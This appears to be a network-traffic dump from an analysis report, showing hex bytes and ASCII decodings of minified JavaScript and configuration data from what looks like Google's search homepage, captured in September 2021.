                                                                                                                                                                      Data Ascii: h+"."+u:""));break;case "dedupe-insert":e.push(f+"."+l+".i"+(u?".1."+h+"."+u:".1"));break;case "hide":e.push(f+"."+l+".h");break;case "copy":e.push("."+D+".c")}}O(k,"vet",e.length?"1"+e.join(";"):"")}if(a)for(var ma in a)O(k,ma,a[ma]);k.log()},ya=function
                                                                                                                                                                      2021-09-14 14:03:24 UTC138INData Raw: 73 74 49 6e 64 65 78 4f 66 28 63 2c 30 29 29 72 65 74 75 72 6e 20 64 2e 73 75 62 73 74 72 28 63 2e 6c 65 6e 67 74 68 29 3b 69 66 28 64 3d 3d 61 29 72 65 74 75 72 6e 22 22 7d 72 65 74 75 72 6e 20 62 7d 3b 76 61 72 20 7a 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 67 65 74 28 22 54 45 53 54 43 4f 4f 4b 49 45 53 45 4e 41 42 4c 45 44 22 29 3b 61 2e 73 65 74 28 22 54 45 53 54 43 4f 4f 4b 49 45 53 45 4e 41 42 4c 45 44 22 2c 22 22 2c 7b 49 3a 30 2c 70 61 74 68 3a 76 6f 69 64 20 30 2c 64 6f 6d 61 69 6e 3a 76 6f 69 64 20 30 7d 29 7d 3b 76 61 72 20 51 3d 6e 65 77 20 50 3b 76 61 72 20 52 3b 76 61 72 20 42 61 3d 46 7c 7c 47 3b 76 61 72 20 53 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67
                                                                                                                                                                      Data Ascii: stIndexOf(c,0))return d.substr(c.length);if(d==a)return""}return b};var za=function(a){a.get("TESTCOOKIESENABLED");a.set("TESTCOOKIESENABLED","",{I:0,path:void 0,domain:void 0})};var Q=new P;var R;var Ba=F||G;var S=function(a){var b=document;return"string
                                                                                                                                                                      2021-09-14 14:03:24 UTC140INData Raw: 28 29 7b 72 65 74 75 72 6e 20 61 2e 66 6f 63 75 73 28 29 7d 2c 35 30 30 29 7d 0a 76 61 72 20 4a 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 4e 28 61 2e 69 2c 7b 6a 3a 33 7d 29 3b 69 66 28 62 2e 74 61 72 67 65 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 26 26 28 61 3d 62 2e 74 61 72 67 65 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 68 6c 22 29 29 29 7b 62 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 22 68 6c 22 29 3b 61 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 3b 66 6f 72 28 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68
                                                                                                                                                                      Data Ascii: (){return a.focus()},500)}var Ja=function(a,b){b.stopPropagation();b.preventDefault();N(a.i,{j:3});if(b.target instanceof Element&&(a=b.target.getAttribute("data-hl"))){b=encodeURIComponent("hl");a=encodeURIComponent(a);for(var c=document.location.search
                                                                                                                                                                      2021-09-14 14:03:24 UTC141INData Raw: 7c 28 62 3d 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 22 29 2c 62 3d 6e 65 77 20 76 28 62 2c 74 29 29 2c 61 2e 68 72 65 66 3d 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 76 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 76 3f 62 2e 67 3a 22 74 79 70 65 5f 65 72 72 6f 72 3a 53 61 66 65 55 72 6c 22 29 7d 2c 4d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6e 75 6c 6c 3d 3d 62 7c 7c 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 61 2e 69 26 26 61 2e 73 26 26 21 61 2e 76 26 26 28 61 2e 69 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 62 6c 6f 63 6b 22 2c 61 2e 76 3d 21 30 2c 61 2e 4c 26 26 49 61 28 61 2e 69 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 6c 69 22 29 29 2c 61 2e 73 2e 73 65 74 41 74 74 72 69 62
                                                                                                                                                                      Data Ascii: |(b="about:invalid#zClosurez"),b=new v(b,t)),a.href=b instanceof v&&b.constructor===v?b.g:"type_error:SafeUrl")},Ma=function(a,b){null==b||b.stopPropagation();a.i&&a.s&&!a.v&&(a.i.style.display="block",a.v=!0,a.L&&Ia(a.i.querySelector("li")),a.s.setAttrib
                                                                                                                                                                      2021-09-14 14:03:24 UTC142INData Raw: 6e 67 28 64 29 29 3b 64 26 26 28 64 3d 21 30 2c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 64 29 26 26 28 64 3d 64 2e 6a 6f 69 6e 28 22 20 22 29 29 2c 22 22 3d 3d 3d 64 7c 7c 76 6f 69 64 20 30 3d 3d 64 3f 28 52 7c 7c 28 52 3d 7b 61 74 6f 6d 69 63 3a 21 31 2c 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3a 22 6e 6f 6e 65 22 2c 64 72 6f 70 65 66 66 65 63 74 3a 22 6e 6f 6e 65 22 2c 68 61 73 70 6f 70 75 70 3a 21 31 2c 6c 69 76 65 3a 22 6f 66 66 22 2c 6d 75 6c 74 69 6c 69 6e 65 3a 21 31 2c 6d 75 6c 74 69 73 65 6c 65 63 74 61 62 6c 65 3a 21 31 2c 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 22 76 65 72 74 69 63 61 6c 22 2c 72 65 61 64 6f 6e 6c 79 3a 21 31 2c 72 65 6c 65 76 61 6e 74 3a 22 61 64 64 69 74 69 6f 6e 73 20 74 65 78 74 22 2c 72 65 71 75 69 72 65 64 3a 21 31 2c 73 6f 72
                                                                                                                                                                      Data Ascii: ng(d));d&&(d=!0,Array.isArray(d)&&(d=d.join(" ")),""===d||void 0==d?(R||(R={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sor
                                                                                                                                                                      2021-09-14 14:03:24 UTC143INData Raw: 72 6e 20 57 28 62 2c 61 2e 44 2c 63 55 29 7d 2c 61 2e 44 2e 6f 6e 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 55 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 28 62 2c 61 2e 44 2c 63 55 29 7d 29 7d 29 3b 61 2e 73 26 26 28 61 2e 73 2e 6f 6e 63 6c 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 4d 61 28 61 2c 62 29 7d 2c 61 2e 73 2e 6f 6e 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 55 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 61 28 61 2c 62 29 7d 29 7d 29 3b 61 2e 69 26 26 0a 28 61 2e 69 2e 6f 6e 63 6c 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 4a 61 28 61 2c 62 29 7d 2c 61 2e 69 2e
                                                                                                                                                                      Data Ascii: rn W(b,a.D,cU)},a.D.onkeydown=function(b){return U(a,b,function(){return W(b,a.D,cU)})});a.s&&(a.s.onclick=function(b){return Ma(a,b)},a.s.onkeydown=function(b){return U(a,b,function(){return Ma(a,b)})});a.i&&(a.i.onclick=function(b){return Ja(a,b)},a.i.
                                                                                                                                                                      2021-09-14 14:03:24 UTC145INData Raw: 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 4d 6f 75 73 63 22 29 3b 74 68 69 73 2e 76 3d 21 31 3b 74 68 69 73 2e 6c 3d 30 3b 74 68 69 73 2e 43 3d 74 68 69 73 2e 69 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 6c 69 22 29 3b 74 68 69 73 2e 58 3d 74 68 69 73 2e 43 2e 6c 65 6e 67 74 68 2d 31 3b 74 68 69 73 2e 4f 3d 30 3b 74 68 69 73 2e 57 3d 74 68 69 73 2e 4c 3d 21 31 3b 74 68 69 73 2e 55 3d 21 30 3b 74 68 69 73 2e 4b 3d 21 31 3b 74 68 69 73 2e 41 3d 74 68 69 73 2e 68 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 2c 20 62 75 74 74 6f 6e 22 29 3b 74 68 69 73 2e 54 3d 74 68 69 73 2e 41 2e 6c 65 6e 67 74 68 2d 31 3b 74 68 69 73 2e 42 3d 74 68 69 73 2e 59 3d 21 31 3b 74 68 69 73 2e 50 3d 5b 5d 7d 3b 28 66 75 6e 63 74 69 6f
                                                                                                                                                                      Data Ascii: t.getElementById("uMousc");this.v=!1;this.l=0;this.C=this.i.querySelectorAll("li");this.X=this.C.length-1;this.O=0;this.W=this.L=!1;this.U=!0;this.K=!1;this.A=this.h.querySelectorAll("a, button");this.T=this.A.length-1;this.B=this.Y=!1;this.P=[]};(functio
                                                                                                                                                                      2021-09-14 14:03:24 UTC146INData Raw: 2e 30 0a 2a 2f 0a 5f 2e 53 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 5f 2e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 7c 7c 21 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 61 3d 21 31 2c 62 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 7b 7d 2c 22 70 61 73 73 69 76 65 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 61 3d 21 30 7d 7d 29 3b 74 72 79 7b 5f 2e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 5f 2e 48 61 2c 62 29 2c 5f 2e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 5f 2e 48 61 2c 62 29 7d 63 61 74 63 68 28 63 29 7b 7d 72 65 74 75 72 6e 20 61 7d 28 29 3b 0a 5f 2e 54
                                                                                                                                                                      Data Ascii: .0*/_.Sd=function(){if(!_.t.addEventListener||!Object.defineProperty)return!1;var a=!1,b=Object.defineProperty({},"passive",{get:function(){a=!0}});try{_.t.addEventListener("test",_.Ha,b),_.t.removeEventListener("test",_.Ha,b)}catch(c){}return a}();_.T
                                                                                                                                                                      2021-09-14 14:03:24 UTC147INData Raw: 6e 65 77 20 47 68 28 5f 2e 46 64 29 3b 5f 2e 67 64 28 22 64 64 22 2c 49 68 29 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 6b 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 62 3d 62 7c 7c 5f 2e 74 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 62 3d 62 5b 61 5b 63 5d 5d 2c 6e 75 6c 6c 3d 3d 62 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 7d 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 76 61 72 20 6c 6a 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 67 62 5f 4e 61 20 2e
                                                                                                                                                                      Data Ascii: new Gh(_.Fd);_.gd("dd",Ih);}catch(e){_._DumpException(e)}try{_.kj=function(a,b){a=a.split(".");b=b||_.t;for(var c=0;c<a.length;c++)if(b=b[a[c]],null==b)return null;return b};}catch(e){_._DumpException(e)}try{var lj=document.querySelector(".gb_Na .
                                                                                                                                                                      2021-09-14 14:03:24 UTC149INData Raw: 4d 61 74 68 2e 63 65 69 6c 28 74 68 69 73 2e 77 69 64 74 68 29 3b 74 68 69 73 2e 68 65 69 67 68 74 3d 4d 61 74 68 2e 63 65 69 6c 28 74 68 69 73 2e 68 65 69 67 68 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 5f 2e 68 2e 66 6c 6f 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 77 69 64 74 68 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 77 69 64 74 68 29 3b 74 68 69 73 2e 68 65 69 67 68 74 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 68 65 69 67 68 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 5f 2e 68 2e 72 6f 75 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 77 69 64 74 68 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 77 69 64 74 68 29 3b 74 68 69 73 2e 68 65 69 67 68 74 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69
                                                                                                                                                                      Data Ascii: Math.ceil(this.width);this.height=Math.ceil(this.height);return this};_.h.floor=function(){this.width=Math.floor(this.width);this.height=Math.floor(this.height);return this};_.h.round=function(){this.width=Math.round(this.width);this.height=Math.round(thi
                                                                                                                                                                      2021-09-14 14:03:24 UTC150INData Raw: 2c 22 64 61 74 61 2d 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 3d 63 7d 29 7d 3b 65 65 3d 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 22 63 65 6c 6c 50 61 64 64 69 6e 67 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 22 63 65 6c 6c 53 70 61 63 69 6e 67 22 2c 63 6f 6c 73 70 61 6e 3a 22 63 6f 6c 53 70 61 6e 22 2c 66 72 61 6d 65 62 6f 72 64 65 72 3a 22 66 72 61 6d 65 42 6f 72 64 65 72 22 2c 68 65 69 67 68 74 3a 22 68 65 69 67 68 74 22 2c 6d 61 78 6c 65 6e 67 74 68 3a 22 6d 61 78 4c 65 6e 67 74 68 22 2c 6e 6f 6e 63 65 3a 22 6e 6f 6e 63 65 22 2c 72 6f 6c 65 3a 22 72 6f 6c 65 22 2c 72 6f 77 73 70 61 6e 3a 22 72 6f 77 53 70 61 6e 22 2c 74 79 70 65 3a 22 74 79 70 65 22 2c 75 73 65 6d 61 70 3a 22 75 73 65 4d 61 70 22 2c 76 61 6c 69 67
                                                                                                                                                                      Data Ascii: ,"data-")?a.setAttribute(d,c):a[d]=c})};ee={cellpadding:"cellPadding",cellspacing:"cellSpacing",colspan:"colSpan",frameborder:"frameBorder",height:"height",maxlength:"maxLength",nonce:"nonce",role:"role",rowspan:"rowSpan",type:"type",usemap:"useMap",valig
                                                                                                                                                                      2021-09-14 14:03:24 UTC151INData Raw: 29 3b 29 7b 69 66 28 62 28 61 29 29 72 65 74 75 72 6e 20 61 3b 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 64 2b 2b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 71 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 43 2e 63 61 6c 6c 28 74 68 69 73 2c 61 29 7d 3b 5f 2e 71 28 5f 2e 71 6a 2c 5f 2e 43 29 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 72 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 61 2e 72 65 6c 3d 63 3b 2d 31 21 3d 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 73 74 79 6c 65 73 68 65 65 74 22 29 3f 28 61 2e 68 72 65
                                                                                                                                                                      Data Ascii: );){if(b(a))return a;a=a.parentNode;d++}return null};}catch(e){_._DumpException(e)}try{_.qj=function(a){_.C.call(this,a)};_.q(_.qj,_.C);}catch(e){_._DumpException(e)}try{_.rj=function(a,b,c){a.rel=c;-1!=c.toLowerCase().indexOf("stylesheet")?(a.hre
                                                                                                                                                                      2021-09-14 14:03:24 UTC152INData Raw: 7d 7d 2c 41 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 43 2e 63 61 6c 6c 28 74 68 69 73 2c 61 29 7d 3b 5f 2e 71 28 41 6a 2c 5f 2e 43 29 3b 0a 76 61 72 20 42 6a 3d 5f 2e 48 28 5f 2e 42 64 2c 41 6a 2c 31 37 29 7c 7c 6e 65 77 20 41 6a 2c 43 6a 2c 7a 6a 3d 28 43 6a 3d 5f 2e 48 28 42 6a 2c 5f 2e 71 6a 2c 31 29 29 3f 5f 2e 64 62 28 5f 2e 45 28 43 6a 2c 34 29 7c 7c 22 22 29 3a 6e 75 6c 6c 2c 44 6a 2c 45 6a 3d 28 44 6a 3d 5f 2e 48 28 42 6a 2c 5f 2e 71 6a 2c 32 29 29 3f 5f 2e 64 62 28 5f 2e 45 28 44 6a 2c 34 29 7c 7c 22 22 29 3a 6e 75 6c 6c 2c 46 6a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 78 6a 28 31 2c 32 29 3b 69 66 28 45 6a 29 7b 76 61 72 20 61 3d 5f 2e 6a 65 28 22 4c 49 4e 4b 22 29 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 74 65
                                                                                                                                                                      Data Ascii: }},Aj=function(a){_.C.call(this,a)};_.q(Aj,_.C);var Bj=_.H(_.Bd,Aj,17)||new Aj,Cj,zj=(Cj=_.H(Bj,_.qj,1))?_.db(_.E(Cj,4)||""):null,Dj,Ej=(Dj=_.H(Bj,_.qj,2))?_.db(_.E(Dj,4)||""):null,Fj=function(){xj(1,2);if(Ej){var a=_.je("LINK");a.setAttribute("type","te
                                                                                                                                                                      2021-09-14 14:03:24 UTC154INData Raw: 2c 73 69 66 3a 74 72 75 65 2c 73 6e 65 74 3a 74 72 75 65 2c 73 74 72 74 3a 30 2c 75 62 6d 3a 66 61 6c 73 65 2c 75 77 70 3a 74 72 75 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 6d 63 3d 27 7b 5c 78 32 32 61 61 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 61 62 64 5c 78 32 32 3a 7b 5c 78 32 32 61 62 64 5c 78 32 32 3a 66 61 6c 73 65 2c 5c 78 32 32 64 65 62 5c 78 32 32 3a 66 61 6c 73 65 2c 5c 78 32 32 64 65 74 5c 78 32 32 3a 66 61 6c 73 65 7d 2c 5c 78 32 32 61 73 79 6e 63 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 63 64 6f 73 5c 78 32 32 3a 7b 5c 78 32 32 63 64 6f 62 73 65 6c 5c 78 32 32 3a 66 61 6c 73 65 7d 2c 5c 78 32 32 63 72 5c 78 32 32 3a 7b 5c 78 32 32 71 69 72 5c 78 32 32 3a 66 61 6c 73 65 2c 5c 78 32 32 72 63 74 6a 5c 78 32 32 3a 74 72
                                                                                                                                                                      Data Ascii: ,sif:true,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22aa\x22:{},\x22abd\x22:{\x22abd\x22:false,\x22deb\x22:false,\x22det\x22:false},\x22async\x22:{},\x22cdos\x22:{\x22cdobsel\x22:false},\x22cr\x22:{\x22qir\x22:false,\x22rctj\x22:tr
                                                                                                                                                                      2021-09-14 14:03:24 UTC155INData Raw: 5c 78 33 64 72 65 73 74 61 75 72 61 6e 74 73 2b 6e 65 61 72 62 79 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 68 75 6e 67 72 79 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 48 75 6e 67 72 79 5c 78 32 32 7d 2c 7b 5c 78 32 32 68 72 65 66 5c 78 32 32 3a 5c 78 32 32 2f 73 65 61 72 63 68 3f 67 77 73 5f 72 64 5c 78 33 64 73 73 6c 5c 5c 75 30 30 32 36 71 5c 78 33 64 66 6c 69 70 2b 61 2b 63 6f 69 6e 5c 5c 75 30 30 32 36 63 73 66 5c 78 33 64 62 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 61 64 76 65 6e 74 75 72 6f 75 73 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 41 64 76 65 6e 74 75 72 6f 75 73 5c 78 32 32
                                                                                                                                                                      Data Ascii: \x3drestaurants+nearby\x22,\x22id\x22:\x22hungry\x22,\x22msg\x22:\x22I\x27m Feeling Hungry\x22},{\x22href\x22:\x22/search?gws_rd\x3dssl\\u0026q\x3dflip+a+coin\\u0026csf\x3db\x22,\x22id\x22:\x22adventurous\x22,\x22msg\x22:\x22I\x27m Feeling Adventurous\x22
                                                                                                                                                                      2021-09-14 14:03:24 UTC156INData Raw: 77 30 68 58 67 7a 44 4d 54 78 36 36 75 6e 5a 61 4e 38 41 4e 4a 48 41 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 74 72 65 6e 64 79 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 54 72 65 6e 64 79 5c 78 32 32 7d 2c 7b 5c 78 32 32 68 72 65 66 5c 78 32 32 3a 5c 78 32 32 2f 75 72 6c 3f 75 72 6c 5c 78 33 64 68 74 74 70 73 3a 2f 2f 61 72 74 73 61 6e 64 63 75 6c 74 75 72 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 61 72 74 6e 65 72 2f 6d 75 73 65 6f 2d 72 65 69 6e 61 2d 73 6f 66 69 61 5c 5c 75 30 30 32 36 73 61 5c 78 33 64 74 5c 5c 75 30 30 32 36 75 73 67 5c 78 33 64 41 4f 76 56 61 77 33 53 39 58 70 41 65 49 4c 6e 51 7a 5a 54 63 63 70 31 62 41 50 6c 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78
                                                                                                                                                                      Data Ascii: w0hXgzDMTx66unZaN8ANJHA\x22,\x22id\x22:\x22trendy\x22,\x22msg\x22:\x22I\x27m Feeling Trendy\x22},{\x22href\x22:\x22/url?url\x3dhttps://artsandculture.google.com/partner/museo-reina-sofia\\u0026sa\x3dt\\u0026usg\x3dAOvVaw3S9XpAeILnQzZTccp1bAPl\x22,\x22id\x
                                                                                                                                                                      2021-09-14 14:03:24 UTC157INData Raw: 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 31 2c 31 2c 30 2c 6e 75 6c 6c 2c 5c 78 32 32 5c 78 32 32 2c 30 5d 27 5d 3b 0a 76 61 72 20 61 3d 6d 3b 77 69 6e 64 6f 77 2e 57 5f 6a 64 3d 77 69 6e 64 6f 77 2e 57 5f 6a 64 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 3d 32 29 77 69 6e 64 6f 77 2e 57 5f 6a 64 5b 61 5b 62 5d 5d 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 61 5b 62 2b 31 5d 29 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 3d 7b 22 53 30 36 47 72 62 22 3a 22 22 2c 22 7a 43 68 4a 6f 64 22 3a 22 25 2e 40 2e 5d 22 2c 22 53 4e 6c 4d 30 65 22 3a 22 22 2c 22 77 32 62 74 41 65 22 3a 22 25 2e 40 2e 5c 22 5c 22 2c
                                                                                                                                                                      Data Ascii: null,null,null,null,0,null,1,1,0,null,\x22\x22,0]'];var a=m;window.W_jd=window.W_jd||{};for(var b=0;b<a.length;b+=2)window.W_jd[a[b]]=JSON.parse(a[b+1]);})();(function(){window.WIZ_global_data={"S06Grb":"","zChJod":"%.@.]","SNlM0e":"","w2btAe":"%.@.\"\",
                                                                                                                                                                      2021-09-14 14:03:24 UTC159INData Raw: 22 23 64 61 64 63 65 30 22 2c 22 23 30 30 30 22 2c 22 23 64 61 64 63 65 30 22 2c 22 23 30 30 30 22 2c 22 23 31 61 37 33 65 38 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 36 29 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 34 29 22 2c 22 72 67 62 61 0d 0a
                                                                                                                                                                      Data Ascii: "#dadce0","#000","#dadce0","#000","#1a73e8",false,false,false,false,false,false,true,false,false,false,false,false,"rgba(0,0,0,.12)","rgba(0,0,0,.26)","rgba(0,0,0,.54)","rgba
                                                                                                                                                                      2021-09-14 14:03:24 UTC159INData Raw: 32 32 34 31 0d 0a 28 30 2c 30 2c 30 2c 2e 38 37 29 22 2c 22 72 67 62 61 28 32 30 34 2c 32 30 34 2c 32 30 34 2c 2e 31 35 29 22 2c 22 72 67 62 61 28 32 30 34 2c 32 30 34 2c 32 30 34 2c 2e 32 35 29 22 2c 22 72 67 62 61 28 31 31 32 2c 31 31 37 2c 31 32 32 2c 2e 32 30 29 22 2c 22 72 67 62 61 28 31 31 32 2c 31 31 37 2c 31 32 32 2c 2e 34 30 29 22 2c 22 23 34 32 38 35 66 34 22 2c 22 23 31 35 35 38 64 36 22 2c 22 23 33 34 61 38 35 33 22 2c 22 23 65 61 34 33 33 35 22 2c 22 23 66 62 62 63 30 34 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 37 30 37 35 37 61 22 2c 22 23 32 30 32 31 32 34 22 2c 22 23 33 34 61 38 35 33 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 22 2c 22 23 33 32 33 32 33 32 22 2c 22 23
                                                                                                                                                                      Data Ascii: 2241(0,0,0,.87)","rgba(204,204,204,.15)","rgba(204,204,204,.25)","rgba(112,117,122,.20)","rgba(112,117,122,.40)","#4285f4","#1558d6","#34a853","#ea4335","#fbbc04","#f8f9fa","#f8f9fa","#f8f9fa","#70757a","#202124","#34a853","rgba(0,0,0,.12)","#323232","#
                                                                                                                                                                      2021-09-14 14:03:24 UTC160INData Raw: 5c 22 23 66 66 66 5c 22 2c 5c 22 23 31 61 37 33 65 38 5c 22 2c 5c 22 23 64 31 64 31 64 31 5c 22 2c 5c 22 23 66 66 66 5c 22 2c 6e 75 6c 6c 2c 31 2c 6e 75 6c 6c 2c 31 34 2c 35 30 30 2c 5c 22 23 31 39 36 37 64 32 5c 22 2c 5c 22 34 70 78 5c 22 2c 5c 22 23 31 61 37 33 65 38 5c 22 2c 5c 22 23 65 65 65 65 65 65 5c 22 5d 22 2c 6e 75 6c 6c 2c 22 25 2e 40 2e 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 5d 2c 30 2c 6e 75 6c 6c 2c 30 2c 30 5d 22 2c 22 65 6e 2d 47 42 22 2c 22 25 2e 40 2e 5c 22 31 33 70 78 5c 22 2c 5c 22 31 36 70 78 5c 22 2c 5c 22 31 31 70 78 5c 22 5d 22 2c 22 25 2e 40 2e 5c 22 31 30 70 78 5c 22 2c 31 30 2c 5c 22 31 36 70 78 5c 22 2c 31 36 5d 22 2c 22 25 2e 40 2e 5c 22 31 34 70 78 5c 22 2c 31 34 5d 22 2c 22 25 2e 40 2e 34 30 5d 22 2c 6e 75 6c 6c 2c 22 25 2e 40
